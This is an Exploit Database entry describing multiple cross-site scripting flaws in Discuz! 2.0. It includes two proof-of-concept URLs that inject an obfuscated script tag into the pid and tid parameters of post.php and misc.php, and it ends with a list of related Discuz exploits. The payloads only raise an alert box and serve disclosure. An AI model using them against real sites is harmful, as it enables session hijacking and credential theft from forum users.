Exploit

EDB-ID: 33464	Author: indoushka	Published: 2010-01-03
CVE: N/A	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: Link	Tags: Vulnerability
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App: N/A

« Previous Exploit Next Exploit »

source: http://www.securityfocus.com/bid/37573/info

Discuz! is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Discuz! 2.0 is vulnerable; other versions may also be affected.


http://www.example.com/Discuz/post.php?action=edit&fid=1&tid=17&pid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&page=1
http://www.example.com/Discuz/misc.php?action=emailfriend&tid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

Related Exploits

Other Possible E-DB Search Terms: Discuz! 2.0, Discuz

Date	Title	Author
2009-12-31	Discuz 1.03 - SQL Injection	indoushka
2008-11-22	Discuz! - Remote Reset User Password Exploit	80vul
2009-12-31	Discuz! 1.0 - 'referer' Parameter Cross-Site Scripting	indoushka
2004-02-05	Discuz! 2.0/3.0 - Cross-Site Scripting	Cheng Peng Su
2006-11-28	Discuz! 4.x - SQL Injection / Admin Credentials Disclosure	rgod
2006-10-25	Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure	rgod
2009-08-15	Discuz! 6.0 - '2fly_gift.php' SQL Injection	Securitylab.ir
2010-01-27	Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting	s4r4d0
2010-03-02	Discuz! 6.0 - 'uid' Parameter Cross-Site Scripting	lis cker
2008-08-06	Discuz! 6.0.1 - 'searchid' Parameter SQL Injection	james
2008-11-14	Discuz! 6.x/7.x - Remote Code Execution	80vul
2009-08-26	Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection	ZhaoHuAn
2009-09-02	Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection	ZhaoHuAn

Discuz! 2.0 - Multiple Cross-Site Scripting Vulnerabilities

Related Exploits